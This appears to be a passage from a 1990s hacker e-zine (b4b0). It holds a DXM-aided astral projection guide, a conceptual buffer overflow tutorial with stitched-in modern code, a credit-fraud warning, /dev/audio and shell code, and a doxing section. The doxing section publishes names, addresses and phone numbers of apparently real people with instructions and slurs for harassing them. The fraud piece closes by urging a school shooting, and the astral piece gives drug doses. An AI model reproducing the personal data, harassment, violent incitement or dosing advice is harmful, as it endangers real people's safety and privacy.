said by some that the whole sensation of leaving your body and exploring
the astral plane is a state of mind. That is definitely not true. I
myself, and many others, have done experimentation. When you get up and
step out of your body you are seeing what is going on in the world just
as you would see it if you were in your physical body. You are just seeing
it from the perspective of a different dimension. The 4th dimension.
3/12/99 - I ingested 500mg of dxm (Dextromethorphan helps induce OOBE).
After the effects started coming on, I lay down in my bed. After about
15 minutes of rhythmic breathing, my body was totally relaxed. I lay there
with a clear mind. My body starts vibrating after about another 5 minutes.
After feeling like my chest was being crushed by some massive force I got
a tingling sensation and I could see through my eyelids. From there, I
laid a moment then lifted my arms slowly until I felt them slide out of
my physical body. I sat up and stared at my lifeless looking body. And I
realized, my body is not me, it is just a shell for my soul. With that in
mind I decided that I wanted to fly to Seattle for no particular reason.
After patrolling the streets of Seattle where I once lived, I felt
an urge to get back to my body but wanted to stop at my ex-girlfriend's
house first. I sort of bounced my way up to her house by gliding through
the air. I went into her room, where we previously used to sit and smoke
pot. I saw a figure sitting in the desk chair with its back towards me.
It slowly turned around, and it was rather a grotesque looking boy with a
sort of transparent image. When he smiled, I realized that I had seen him
before at my house in Seattle when I woke up one night after a horrifying
dream. I quickly flew back to my body, through blurs of colors and over
trees and buildings. As I laid in my body, I felt like I couldn't get back
in alignment. I started to get sorta freaked out but after a few minutes
of struggling I managed to regain contact with my physical parts.
True story? Of course.
If you would like to try something like this, I am giving you my personal
method in having out of body experiences. Expect this to take some practice
and time. If you are willing to take dxm to help induce an OOBE, then great.
It makes it 10 times easier.
First lay down, on the floor or on your bed. Your head and feet should
be even. Meaning you shouldn't be laying on a pillow or anything. Next
with your hands at your sides, start out with rhythmic breathing. Like so:

    Breathe in for 2 seconds
    Breathe out for 4 seconds
    Breathe in for 2 seconds
    Breathe out for 4 seconds
    Breathe in for 2 seconds
    Breathe out for 4 seconds
    Breathe in for 3 seconds
    Breathe out for 6 seconds
    Breathe in for 3 seconds
    Breathe out for 6 seconds
    Breathe in for 3 seconds
    Breathe out for 6 seconds
    Breathe in for 4 seconds
    Breathe out for 8 seconds
    Breathe in for 4 seconds
    Breathe out for 8 seconds
    Breathe in for 4 seconds
    Breathe out for 8 seconds

The whole time you are doing this rhythmic breathing, you should be
letting yourself get totally relaxed. Don't worry about dozing off or
entering a sleep state, because that in itself could help you leave your
body. One of the main theories behind astral projection is that you are
in a sleeping state while still being in a conscious type state of mind.
On one occasion, I felt that I had fallen asleep. Then I woke up, and
stood up out of bed. A second later I realized it was a totally false
awakening because I saw my physical body laying there on my bed limp
and breathing. Another thing, as you are doing this try to maybe breathe
in a way that you are breathing in correspondence to your heart's rhythm.
For example, you feel your heart beat, then you breathe in for two
seconds, you hear it beat again, then you breathe out for four seconds.
Just experiment with it, and find your own technique in getting really
relaxed.
Repeat this method until every
muscle in your body is relaxed to its fullest.
After this, try to have a totally clear mind. Think about absolutely
nothing. Concentrate only on your feet until they start to feel like
they are floating. Move up to your hips and concentrate in the same
manner. By now, you should start feeling powerful vibrations throughout
your body, like you're being electrocuted. You may even feel pain. But
that is one of the things you will have to learn, trust that you will be
ok. Don't back down, it is all a state of mind. After much vibration
you may be able to see through your eyelids. This means you have
succeeded. From here, picture yourself rising out of your body.
And you may just find yourself sitting up and exiting your physical shell.
You may say "What a huge crock of shit, leaving your body could not
possibly be so easy." Yes, this method is fairly simple, but it takes much
practice for your average person. It personally took me several months
to start getting anywhere in the experience after I reached the vibrations.
But after you get your first OOBE, there are many more to come. If you
want to experience an OOBE possibly on your first try, as I said before..
dissociatives, like ketamine, pcp help induce them. But most notably
dxm (dextromethorphan). Check out http://www.frognet.net/~dxm for the
dxm FAQ, or http://www.alaska.net/~zorak/dxm if you would like to download
an issue of the dxm magazine.
Conclusion,
Hopefully this article gave you a little bit of insight as to what
astral projection is all about. If you would like to further your knowledge
in the area, search for "OOBE", "astral projection" etc. on a search engine.
Or go to the library and check out a book on the subject, e.g.
"Leave your body in 21 days". Also http://www.winternet.com/~rsp/obebook.html
is a good book by Robert Peterson on how to have OOBE, and it's online
in HTML! I hope you enjoyed the article =)
ph1x@b4b0.org
--------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!> Womper Language Interpretor, by chrak <b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------------
This is a neat language interpreter by chrak, that is still in development.
Check out /w0mper, and make sure to read Example.sh to see a set of example
code.
* NOTE * this isn't quite finished and hopefully chrak will come through
with more releases. Thank you.
----------------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> Buffer overflow exploitation, by ph1x <b4b0!b4b0!b4b0!b4b0!b4b0!>
----------------------------------------------------------------------------------------
Buffer overflow exploitation.
NOTE: This article does not explain how to write buffer overflows,
but rather explains how they are taken advantage of.
Ok, there have already been several articles released on buffer overflows
and how they are taken advantage of. I talk to people on IRC every day
who claim to have skillz, yet believe it or not many of them do not have
the slightest idea as to what a buffer overflow is, how they work, and
how they are exploited. I'm going to give a brief introduction to them
in this article, and I'm hoping that you will have a much better
understanding of buffer overflows after going over this. I have a feeling
that many people find aleph1's article too complex to understand, so I will
try to put the concept of buffer overflows into your head with basic ideas.
__________________________
|What is a buffer overflow?|
A buffer overflow is just what it sounds like: overflowing a buffer
with more data than it can hold. In doing so, you can change the flow of
execution by overwriting the return address on the stack.
The stack is a type of data structure that is set up through the ss (stack
segment) register when a program is called to be executed. It is what the
program's execution is based on. It has several operations, but the two
important ones that we need to know are PUSH and POP. PUSH adds data to the
top of the stack, like instruction code. POP then removes the last piece of
data on the stack, making it smaller. There is also an important register
called the SP register (Stack Pointer), which points to the address of
whatever is at the very top of the stack. This actually varies, depending
on the processor. For example, on Intel and SPARC processors the stack
grows in a downward direction towards lower addresses, so the SP points to
the top of the stack where new instruction is being placed. On other
implementations the stack may grow up, so the SP points to the bottom of
the stack. In addition to the stack pointer, there is another register that
is commonly referred to as the FP (Frame Pointer), which points to a frame
on the stack. The distance between the SP (at the top of the stack) and the
FP (in one of the stack frames) is used to find the addresses of local
variables and access them. The return address (RET) holds the address of
the instruction that executes next once a function returns. With all of
this in mind, let's take a look at a simple example and see how the stack
might look.
--------------------------example1.c----------------------------------------
#include <stdio.h>

/* two arguments and one local buffer, to show how a stack frame is laid out */
void integer(int x, int y) {
    char bleh[10];
}

int main(void) {
    integer(1, 2);
    return 0;
}
----------------------------------------------------------------------------
The stack would look like this.

     [ bleh ]  [ FP ]  [ RET ]  [ X ]  [ Y ]
 Top of the stack                  Bottom of the stack

How in the hell does all this fit together???
Well, let's look at one more example.
--------------------------example2.c----------------------------------------
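#include <stdio.h>
#include <string.h>

void overflow_dat_shiat(char *big_string);

int main(void) {
    char string[100];
    int i;

    /* fill the string with 99 'A' characters */
    for (i = 0; i < 99; i++) {
        string[i] = 'A';
    }
    string[99] = '\0';   /* terminate it so strcpy() knows where to stop */
    overflow_dat_shiat(string);
    return 0;
}

void overflow_dat_shiat(char *big_string) {
    char buffer[32];

    /* the bug: strcpy() does no bounds checking on the 32 byte buffer */
    strcpy(buffer, big_string);
}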
-----------------------------------------------------------------------------
This code has an error. It uses strcpy(), which does no bounds checking,
and copies 100 bytes of 'A' chars into a buffer that is only 32 bytes.
Therefore, everything on the stack after the 32 byte buffer is overwritten
with A's hex value, which is 0x41. When this program is run, it
gets a segmentation violation. Why? Because the return address (RET),
which should hold the next set of instruction to execute, was
overwritten with the continuous hex value of 0x41, like 0x41414141.
So when it tries executing the set of instruction assigned to
0x41414141 it seg faults.
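A hardened counterpart to example2.c, as an added example that is not from the original article: the copy checks the source length against the destination size and refuses input that does not fit. copy_bounded(), store_string(), struct frame and the guard value are hypothetical names, and the guard field only models the data that sits after the buffer on the stack.

```c
#include <stdio.h>
#include <string.h>

#define GUARD_VALUE 0x0BADC0DEUL  /* constructed marker, stands in for FP/RET */

/* Models the layout from the article: a 32 byte buffer followed by data
 * that must survive the copy. */
struct frame {
    char buffer[32];
    unsigned long guard;
};

/* Copy src into dst (capacity dst_size, terminator included).
 * Returns 0 on success, -1 if src does not fit. On failure dst is left as
 * an empty string, and nothing is ever written past dst_size bytes. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    len = strlen(src);
    if (len >= dst_size)
        return -1;               /* refuse instead of truncating or overflowing */
    memcpy(dst, src, len + 1);   /* +1 copies the terminator */
    return 0;
}

/* Hardened counterpart of overflow_dat_shiat(): returns 0 if the string was
 * stored, -1 if it was rejected. *guard_intact reports whether the data
 * after the buffer still holds its original value. */
int store_string(const char *big_string, int *guard_intact)
{
    struct frame f;
    int rc;

    f.guard = GUARD_VALUE;
    rc = copy_bounded(f.buffer, sizeof f.buffer, big_string);
    *guard_intact = (f.guard == GUARD_VALUE);
    return rc;
}

int main(void)
{
    char string[100];
    int intact;

    memset(string, 'A', 99);     /* same input as example2.c */
    string[99] = '\0';
    printf("99 x 'A': rc=%d\n", store_string(string, &intact));
    printf("guard intact: %d\n", intact);
    printf("short:    rc=%d\n", store_string("b4b0", &intact));
    return 0;
}
```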
Understanding this, think what would happen if we could get the return
address to execute instructions assigned to a VALID address, maybe
an address that holds code. Code that spawns a shell. We could gain
root if the program we're overflowing is +s.
To not get very complex, I'm going to finish this article with a clean,
easy to understand example of how we can accomplish this.
We would want to fill the buffer we are overflowing with code that
spawns a root shell, followed by the address of where the buffer
we are overflowing starts. Take a look. 'X' stands for the code
that executes a shell and we'll say that "0xF4" is the address
of where the buffer begins.
  Buffer    FP    RET
[XXXXXXXX][XXXX][0xF4]  <--- Filled the buffer and FP with shell
                             instruction followed by the address
                             of where the shell instruction begins.
                             So RET(return address) is going to execute
                             the instruction that is assigned to 0xF4
                             which happens to be code that spawns a
                             shell.
Many times we have trouble finding the exact address where the
buffer begins. So we can just fuck with the address a little bit.
Of course your chances won't be very good at guessing, but there is
something called "Padding" that we can do. We fill about half of
the buffer with something called NOP instruction. And if the return
address executes an address that happens to land anywhere in the
NOP instruction, the NOPs will just keep executing until they reach
our shell code. For our last example, 'Y' stands for our NOP code
and 'X' still stands for shell code. Let's say we don't know that
the buffer starts at 0xF4, but we're going to assume that
it starts at 0xF6.
  Buffer    FP    RET
[YYYYYYXX][XXXX][0xF6]  <--- This would land at the second piece of
                             our NOP instruction. And although we
                             don't have an exact address of where our
                             shell code starts, our NOP instruction
                             is going to execute all the way until
                             it reaches our shell code. The shell
                             code then continues being executed.
                             Then poof!@#$ A shell is spawned.
What happens if the buffer we want to overflow happens to be
too small for the shell code to fit in? Well, in most cases
you have access to the environment variables on the stack.
With this in mind, we can stuff the shell code in one of
the variables, and overflow the buffer with the address
of the variable holding our shell instruction.
How might I go about auditing source code to find buffer overflow errors?
Well in our example, we used the function strcpy(). But there are several
functions that do not do boundary checking: strcpy(), strcat(), sprintf(),
and vsprintf(). gets() is also a problem. Unlike the 4 functions above,
which rely on NULL for string termination, gets() reads a line from
stdin into a buffer, until a newline or an EOF. Also, a while() loop
does not check for character overflows, for example a loop that fills a
buffer with, say, 'A' a specific number of times. So when auditing source,
keep your eye out for these particular functions, and in many cases you
will find a buffer overflow error. Good luck =)
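One way to automate the audit described above, as an added example that is not from the original article: a scanner that reports every call to the five functions named there, matching whole identifiers so that bounded relatives such as fgets() and snprintf() are not flagged. audit_source(), struct finding and the sample input are hypothetical and constructed for illustration; a hit still needs a human to check the buffer sizes involved.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The functions the article names as doing no bounds checking. */
static const char *const UNBOUNDED[] = { "strcpy", "strcat", "sprintf", "vsprintf", "gets" };
struct finding { int line; const char *name; };  /* 1-based line, flagged name */
#define IS_IDENT(c) (isalnum((unsigned char)(c)) || (c) == '_')

/* Return the flagged name equal to the identifier tok[0..n), or NULL. */
static const char *lookup(const char *tok, size_t n)
{
    size_t k;
    for (k = 0; k < sizeof UNBOUNDED / sizeof UNBOUNDED[0]; k++)
        if (strlen(UNBOUNDED[k]) == n && memcmp(tok, UNBOUNDED[k], n) == 0)
            return UNBOUNDED[k];
    return NULL;
}

/* Skip the string or character literal opening at src[i]; return the index
 * just past it. Stops at end of line so a stray quote hides one line only. */
static size_t skip_literal(const char *src, size_t len, size_t i)
{
    char quote = src[i++];
    while (i < len && src[i] != quote && src[i] != '\n') {
        if (src[i] == '\\' && i + 1 < len && src[i + 1] != '\n')
            i++;                /* step over the escaped character */
        i++;
    }
    return (i < len && src[i] == quote) ? i + 1 : i;
}

/* Record every call to a flagged function in the C source text src. Names
 * must be whole identifiers followed by '(' so fgets(), snprintf() and
 * my_strcpy() are not reported; comments and literals are skipped.
 * Returns the number of findings; at most max_out are stored in out. */
int audit_source(const char *src, struct finding *out, int max_out)
{
    size_t i = 0, k, start, len = strlen(src);
    int line = 1, found = 0;
    const char *name;
    while (i < len) {
        if (src[i] == '\n') {
            line++;
            i++;
        } else if (src[i] == '/' && i + 1 < len && src[i + 1] == '*') {
            for (i += 2; i + 1 < len && !(src[i] == '*' && src[i + 1] == '/'); i++)
                if (src[i] == '\n')
                    line++;
            i = (i + 1 < len) ? i + 2 : len;    /* past the comment close */
        } else if (src[i] == '/' && i + 1 < len && src[i + 1] == '/') {
            while (i < len && src[i] != '\n')
                i++;
        } else if (src[i] == '"' || src[i] == '\'') {
            i = skip_literal(src, len, i);
        } else if (IS_IDENT(src[i])) {
            for (start = i; i < len && IS_IDENT(src[i]); i++)
                ;
            for (k = i; k < len && (src[k] == ' ' || src[k] == '\t'); k++)
                ;
            name = (k < len && src[k] == '(') ? lookup(src + start, i - start) : NULL;
            if (name != NULL) {
                if (found < max_out) {
                    out[found].line = line;
                    out[found].name = name;
                }
                found++;
            }
        } else {
            i++;
        }
    }
    return found;
}

/* Constructed sample input, not code from the article. */
static const char SAMPLE[] =
    "/* strcpy(a, b) in a comment is ignored */\n"
    "void f(char *in, FILE *fp) {\n"
    "    char buf[32], line[64];\n"
    "    fgets(line, sizeof line, fp);\n"
    "    snprintf(buf, sizeof buf, \"%s\", in);\n"
    "    strcpy(buf, in);\n"
    "    strcat (buf, line);\n"
    "    puts(\"gets(x) inside a string\");\n"
    "    gets(line); sprintf(buf, \"%s\", in);\n"
    "}\n";

int main(void)
{
    struct finding f[16];
    int i, n = audit_source(SAMPLE, f, 16);
    for (i = 0; i < n && i < 16; i++)
        printf("line %d: %s() does no bounds checking\n", f[i].line, f[i].name);
    return 0;
}
```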
Conclusion:
Hopefully after reading this, you have a better understanding as
to how buffer overflows work and how they are exploited. If so
you might feel comfortable with reading a more detailed and
comprehensive article such as "Smashing the stack for fun and profit"
by Aleph.
Hope you enjoyed this article.
ph1x@b4b0.org
-------------------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> The stupidity that lies in credit fraud, KKR <!b4b0!b4b0!b4b0!b4b0!>
-------------------------------------------------------------------------------------------
I would first like to start by stating the intent of this article. I
have seen far too many of my friends busted for credit card fraud lately.
It's probably one of the dumbest things you can do with your computer skills.
Sure, it's probably profitable to card tons of hardware and sell it off at
half the price and make a bundle. Easy money right? Well, you won't be
laughing when you're in jail and owe thousands of dollars to the government
for credit card fraud. Now don't get me wrong, if you really want to get busted
then go ahead, this is definitely the way to go. It's probably one of the
easiest ways. There is almost a 100% chance that you will be caught and
arrested, no matter what type of precautions you take. If you get caught,
arrested and convicted for credit fraud, the consequences can be extremely
brutal. No matter what age you are, you will almost definitely be tried as
an adult. If convicted, you will never be able to get any type of government
job. This doesn't just include the FBI or other high level jobs, but you
wouldn't even be able to qualify for a janitor in a public school, or a
bus driver on a city bus. "Oh," you say, "Well, I'm really safe about carding,
I use wingates and proxies, and I never order stuff to my house. There's
no way they can catch me." Wrong. The feds have complicated ways of catching
carders, and trust me, it's very hard not to get caught. First of all, proxy
servers and the like can be unsafe. Many times they log all connections, so
the federal agencies have only to call the owners of the machine, and
request the logs for a certain time. A request which they will most usually
comply with. Ever hear of the kids who broke into the pentagon? They used
all sorts of proxies and shit, and what happened to them? They got their
asses caught. Drop email addresses for reply emails from the company you're
carding from can get you caught as well. Places like hotmail and yahoo
usually log the host you're using to get your mail, so that's not safe
either. You like bragging about your carding on IRC? Federal agents
frequent irc carding channels so I'd stay away from them. You think it's
safe to card stuff to an empty house? Federal agents can place a small
packet of material that can easily be tracked by trained dogs in the
package if they are investigating you for carding, so if you bring the
merchandise home, you're screwed. If you're carding now, stop. If you're
thinking about doing it, think again. I have a much better and more
rewarding idea. Bring a shotgun to school and blast a few teachers, you
have a pretty good chance of getting away with it.
Kaptain Kangaroo
----------------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> Screwing around with /dev/audio, by ph1x <!b4b0!b4b0!b4b0!b4b0!>
----------------------------------------------------------------------------------------
In unix, all of your devices are referred to as "special files".
I have heard several people asking about /dev/audio, and how to access it
and take advantage of it etc. I decided to write an article on it.
Below are some functions that I wrote that you can use to read and write
from /dev/audio. Enjoy =)
-------------------------------funct10nZ-------------------------------------
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

#define DEVICE "/dev/audio" /*duh*/

int fd = -1; /* this is our audio device file descriptor */

/* this opens /dev/audio for reading and writing, retrying if interrupted */
int open_sound(void)
{
    while (((fd = open(DEVICE, O_RDWR)) == -1) &&
           (errno == EINTR))
        ;
    if (fd < 0)
        return -1;
    return 0;
}

void close_sound(void) /* this closes /dev/audio */
{
    close(fd);
    fd = -1;
}

/* this reads up to maxb bytes from /dev/audio */
int read_sound(char *buff, int maxb)
{
    ssize_t bytes;

    while (((bytes = read(fd, buff, (size_t)maxb)) == -1) &&
           (errno == EINTR))
        ;
    return (int)bytes;
}

/* this writes size bytes to /dev/audio, retrying after partial writes */
int write_sound(char *buffer, int size)
{
    ssize_t written = 0; /* bytes written */
    size_t tried;        /* bytes still to write */
    char *buffl;

    buffl = buffer;
    tried = size;
    while (tried != 0) {
        if ((written = write(fd, buffl, tried)) >= 0) {
            tried -= written;
            buffl += written;
        }
        else if (errno != EINTR)
            break;
    }
    if (written == -1)
        return -1;
    else
        return size;
}
-------------------------------------------------------------------------------
So the following function prototypes should be in like bleh.h like so..
int open_sound(void);
void close_sound(void);
int read_sound(char *buff, int maxb);
int write_sound(char *buffer, int size);
-----------------------------------------
Lets write a little proggy that reads from the microphone now.
--------------------------------microphone.c------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include "bleh.h"

#define BUF 1024

int main(void) {
    char buffer[BUF];
    int nread; /* bytes read from the microphone */

    if (open_sound() == -1) {
        fprintf(stderr, "Could not open /dev/audio\n");
        exit(1);
    }
    printf("Speak into your microphone now, HEH!@#$\n");
    while (1) {
        /* copy whatever the microphone delivers straight to the speakers */
        if ((nread = read_sound(buffer, BUF)) == -1) {
            fprintf(stderr, "Could not read microphone\n");
            break;
        } else if (write_sound(buffer, nread) == -1) {
            fprintf(stderr, "Could not write to speakers\n");
            break;
        }
    }
    close_sound();
    exit(0);
}
----------------------------------------------------------------------------------------
Pretty cool huh? We had a chance to use all of my functions in this
program. Unfortunately I didn't have a lot of time to extend any further
on this article. Sorry. Enjoy =)
ph1x@b4b0.org
----------------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> My day in age, by rhinestone cowboy <!b4b0!b4b0!b4b0!b4b0!b4b0!>
----------------------------------------------------------------------------------------
I had an epiphany the other day. It wasn't the kind of flash of
insight that makes you shave your head, move to the desert, and change
your name to something that sounds like an astronomical phenomenon, but
I do think it's something that other people need to hear. You see, I
am a professional consultant, and with this project, I became a man.
I was tasked with building a firewall for a healthcare facility. This
wasn't very difficult, and, apart from the planning phases and a lot of
mostly useless meetings, it got built in a day or two. All the exceptions
were put in place, and the LAN was protected to a degree to which it
had never been protected before. All was right with the world...
... Until the client got involved. It started with a simple request.
"Could you please open up telnet services in the firewall to this one
particular Solaris box? We have a few outside consultants who need to
get into that box so they can work remotely. In particular, we have a
user from an educational facility who needs remote root access."
I objected, of course, but I was then informed that it was the
opinion of the IS staff, that this was an "acceptable risk." This wasn't
an opinion that could be justified by anyone, especially after they
shelled out countless thousands of dollars on a "network security solution".
It got a little worse, of course. About a week later, I uncovered a
bug in their web front end to their database. Instead of praise, I got
what I should have expected, exchanges like the following:
"Only people who subscribe to this database should have access. Now you
are telling me that ANYONE on the net can get this data for free? What
the hell is that firewall doing?"
"The firewall is doing its job. The problem is that your web app never
asked me for anything like a password. It just gave me access. It
really wasn't complicated at all. A firewall simply cannot fix your buggy
software."
"Firewalls make computers secure. This computer isn't secure. Obviously,
the firewall you made doesn't work."
He just didn't get it. I would have been more than happy to spend the
time to audit all the machines individually, apply the proper patches,
and fix any configuration errors that may rear their ugly heads, if the
client was willing to pay for my time. Hell, I'd even work hard!
Unfortunately, the client didn't want to hear that. He wanted his "magic
bullet," and if I wasn't willing to provide it, he'd hire another consulting
company to do it.
It then occurred to me that this scenario is being played out all
over the net, and it's a lot bigger than I had previously realized. I was
playing a part, so was the IS director, so was my company, and so was the
firewall.
Corporate America is all about "covering your ass." No one wants
accountability for anything. If bullshit and 'passing the buck' were the
keys to world domination, the USA would be the world's only super power.
Wait, never mind...
Anyway, this is what hit me. Firewalls do a lot more than filter
packets and give IS gimps a warm fuzzy feeling when they go home at night.
Firewalls manage to almost universally remove any traces of accountability
in corporate security. As in the above example, if, I mean when, someone
sniffs the root password and uses it to compromise the LAN, the IS
department can pretend that they weren't at fault. They can pass the buck
to me or my company. Fortunately, there is a contract protecting us from
lawsuits of that nature. If necessary, the buck can even be passed, either
by my company or the clients, to the vendor. Even they can pass the buck,
since any rational person would realize that they weren't involved in this
morass.
The myth of the "firewall as a magic bullet" is some of the most
useful bullshit ever spun. It allows everyone to sleep easier at night
and make a lot of money. Of course, the buck ultimately stops getting
passed by another piece of bullshit, the myth of "the genius hacker." I'm
not saying that there aren't some genuinely brilliant people breaking into
computers these days, but chances are they aren't relying on a 5 year old
sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly
enough to have a guessable NIS mapname.
The world is very broken. We have security products that either
simply don't work, don't work up to the impossible expectations put on them,
or even introduce further holes in hosts and networks they are supposed
to be protecting. We also have a world of corporate IS managers, mostly
incompetent "security consultants", and talentless bullshit artists
who manage to social engineer their way into six figure incomes because
they are "reformed hackers."
It would be nice if some kind of messiah of the computer age were to
come along and make it all better. Unfortunately, that's not going to
happen. If there was such a person, we'd either nail him to a cross or he
would opt for the huge paycheck which comes with playing a part in the
system. I suspect I have finally entered into adult life, because I have
little or no desire to change an awful system that I cannot fix. There
are quite a bit of rewards for being as corrupt as everyone else. So here
is the choice facing us all, either sit down at the table of corruption
and shared guilt and get paid a lot (basically sell out) or fight a
hopeless battle against American corporate culture. I think adulthood is
really choosing to play in the "bullshit playground" with the rest of
the grownups. Today, I am a man.
Rhinestone Cowboy
--------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> d0x (For your harrasing enjoyment) by pG <!b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------------
hey kids! it's yer friendly neighborhood nazi death metal anarchist,
racist, fucked up, mentally disturbed, cracked up, dopehead, abortion
supportin, nigger lovin, grave desecrating, dj sporting, rave killing,
teacher hating, school burning, car alarm setting, payphone breaking,
road sign tagging, unethical hacking motherfucker, plastik gezus.
and guess what i got for you people today...that's right people, i've
got a fresh little hax0r kiddie. you all know them, and love to
fuck with them. and since i seem to be like a lamer magnet since
my name gets posted on every "leet-0 hax0r" site on the
internet, i thought i'd share this one special kid with you.
the first thing a pipe-dream hacker needs is a leet handle, as for this
kid, his name is "datasyn." oh wait i'm sorry... "dAtasYn."
my bad... however, that's obviously not his real name. for the sake
of this article we're going to call him... oh.... Mike Feltenberger.
now you may ask yourself what the point of having a el8 hax0r of
your own is. well.. these people can be very fun. for example: say
you're bored and you and your friends are sitting around thinking
of something to do. you've got a phone. well, you could prank call
him. all you would need is a number, like.. say.. 724/588-8963 or
maybe 724/588-9138.
now you're set! see how much fun that is?
or you could shut off his phones all together, all you need is an address
(like 80 Clarksville Street; Greenville, PA) and a tiny bit of skill
and you're all set, my friend.
now i know what you're saying:
"sure this is fun for a few months, but what happens when i get bored
with making his life crap?" well, then you can move on to his
friends. losers always have some homosexual friends. in this case
it would be a little hax0r group called the Hax0rz MatrickZ.
but you say, "well i'm really lame, and i can't get d0x as elite
as you pG, will you help me?"
why of course, friend!
the owner of this wonderfuly leet-0 hax0r gr0up is none other than the
never-heard-of-before-because-has-never-done-anything
nEoGoD. let's call him... say... Josh Hanselman.
"but pG, what do i do with just his name?"
easy, let's pretend you didn't have enough skill to get his phone number (which
is 724/646-1599
btw). you could still get his address using directory services and
post sex ads on yahoo.com. hours of family fun!
"ok pG, but can't i make random calls to other people he knows and start talking
shit about him?"
why of course! now you're thinkin.. you could
get the numbers of his friends too if you were el8 enough. (like
say.. 724/646-0465, 724/475-2294, and 724/253-2750)
see how much fun this is?
"yeah it is, but what about his girlfriends?"
oh that's easy, Erin.. i mean, whoever it may be, can be called and
harassed just as well. like say her phone number was 724/588-0817,
you could call up and say "hey Erin (or whatever her name is),
you sissy cunt, are you ready for my dick bitch?"
"what happens when 5000 people start calling them?"
well, let's say your victim was called vyle-t0ne (724/342-2768) and he
thought he was a leet hax0r, well he would quickly be put in his place and
probably leave the internet in fear.well that's all for now kids. have
fun. and yes, this WAS boring to write just as it was boring to read. so
fuck off kid! my ass is bleeding, bye.
Your friend, Plastic Gezus
*************[BONUS DOX!@#$]************
Coolio: Joseph fillmore 1314
Comstock St. San Diego, CA 92111
Phone: 619-268-8330
-----------------------------------
overdose aka Shawn : 517-262-2199
1-800-800-8689, pin # 80008310
54 (alpha op dispat
ch) 313-238-2660 (numeric/voicemail)
---------------------------------------------------------
Digitalx: (604)951-1191
*****************************************
PS. Dox dropping is lame, but for these 3 gimps, we made
an special exception.
--------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!> Coding a shell from the ground up, ph1x <b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------------
In this article I am going to discuss what a shell is and how a shell
works, and we're going to build a shell from the ground up.
For all the source we're going to be writing today, we will need b4b0shell.h
included below.
Let's get started. A shell is a program that does command
interpretation. A shell can also be referred to as a command processor,
as most DOS users know. It reads input, then executes the command.
The execution of a command is basically creating a child process for
the execution. For example, the shell will fork() a child process to
execute the command. The parent (the shell) will then wait for its child
to finish before it reads another command. Before we start coding, make
sure you're using the following header file in all of your codez..
/**********************************/
/* Header file for the b4b0 shell */
/* Extrapolated from ush.h, and */
/* added onto. ph1x@b4b0.org */
/**********************************/
/*
NOTE: We won't be making use of this whole header file today.
Our shell is not going to have the complexity of the
standard unix shell that you use on a daily basis.
*/
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/wait.h>
#include <limits.h>
#define STDMODE 0600
#define DELIMITERSET " ><|&" // we are only going to add redirection to
// our shell, not background or pipe support
#ifndef MAX_CANON
#define MAX_CANON 256
#endif
#define TRUE 1
#define FALSE 0
#define BLANK_STRING " "
#define PROMPT_STRING "b4b0$"
#define QUIT_STRING "quit"
#define BACK_STRING "&" // for background process
#define PIPE_STRING "|" // pipe support
#define NEWLINE_STRING "\n"
#define IN_REDIRECT_SYMBOL '<' //redirection
#define OUT_REDIRECT_SYMBOL '>' // symbols
#define NULL_SYMBOL '\0'
#define PIPE_SYMBOL '|'
#define BACK_SYMBOL '&'
#define NEWLINE_SYMBOL '\n'
int makeargv(char *s, char *delimiters, char ***argvp);
int parsefile(char *inbuf, char delimiter, char **v); // this will return
// the token following delimiter if its present in *s.
int redirect(char *infilename, char *outfilename); // performs redirection
int connectpipeline(char *cmd, int frontfd[], int backfd[]);
/*************************-=EOF=-******************************/
First we will write an extremely basic command interpreter,
just for you to get a basic idea as to how a shell calls
a child process to execute commands, and for you to experiment
with.
---------------------------bsh v1.0-----------------------------------
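#include "b4b0shell.h"
#define MAX_BUF 500

int main(void) {
    char input[MAX_BUF];
    char **rargv;

    while (1) {
        fprintf(stderr, "%s\n", PROMPT_STRING);
        fgets(input, MAX_BUF, stdin);
        /* drop the newline that fgets() keeps, so "quit" and "ls" match */
        input[strcspn(input, NEWLINE_STRING)] = NULL_SYMBOL;
        if (strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if (fork() == 0) {
                if (makeargv(input, BLANK_STRING, &rargv) > 0)
                    execvp(rargv[0], rargv);
                /* no error check here: if execvp() fails, the child carries on */
            }
            wait(NULL);
        }
    }
    exit(0);
}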
--------------------------------EOF-----------------------------------------
Pretty simple huh? When you run it, go ahead and execute some basic
programs, like ls, grep, find etc. It works! Now, as I said before
this is a very raw basic shell, and does not support wildcards like
'*' or '?'. Also, it doesn't support certain commands like 'cd' which
is available in any good shell. What if by some chance the wait() isn't
called? Well, not too much of a problem, but if a user enters a command
before the previous one has finished, the commands will execute concurrently
(read my article on concurrency). Also, due to the fact that this
first version we wrote does not check for errors on the execvp() call
it gets fucked up if you enter an invalid command. Your shell won't
get control back from the child process and the child process creates
its OWN shell. So you have to type 'quit' to get back to your parent
shell. Let's write a better version of this shell, that handles errors
with execvp(), and we will also replace the #define'd MAX_BUF with
MAX_CANON (located in b4b0shell.h), because MAX_BUF is nonportable.
----------------------------bsh v2.0-------------------------------------
#include "b4b0shell.h"

/* Runs in the child: build argv from the command line and exec it.
 * Never returns to the caller. */
void execthecommand(char *incmd) {
    char **rargv;

    if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if(execvp(rargv[0], rargv) == -1) {
            printf("Invalid command\n");
            exit(1);
        }
    }
    exit(1);
}

int main(void) {
    char input[MAX_CANON];
    pid_t child_pid;

    while(1) {
        fputs(PROMPT_STRING, stdout);
